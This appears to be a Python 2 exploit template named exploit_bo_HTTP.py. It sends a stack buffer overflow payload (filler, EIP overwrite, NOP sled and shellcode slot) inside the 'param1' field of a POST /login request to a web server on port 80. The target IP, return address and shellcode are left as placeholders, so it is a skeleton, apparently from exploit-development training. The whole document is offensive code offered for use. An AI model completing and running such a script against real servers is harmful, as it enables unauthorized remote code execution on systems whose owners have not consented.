exploit_bo_HTTP.py

#!/usr/bin/python
import socket
IP="x.x.x.x"
PORT=80

try:
    print "\nSending buffer..."

    myprecious = ("\x..\x..")

    filler = "A" * 100
    eip = "\x..\x..\x..\x.."
    offset = "C" * 4
    nops = "\x90" * 10

    inputBuffer = filler + eip + offset + nops + myprecious

    content = "param1=" + inputBuffer + "&param2=Abc"
    buffer = "POST /login HTTP/1.1\r\n"
    buffer += "Host: " + IP + "\r\n"
    buffer += "User-Agent: abc\r\n"
    buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buffer += "Accept-Language: en-US,en;q=0.5\r\n"
    buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
    buffer += "Content-Length: "+str(len(content))+"\r\n"
    buffer += "\r\n"
    buffer += content
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))
    s.send(buffer)
    s.close()
    print "\nDone!"
except:
    print "\nCould not connect!"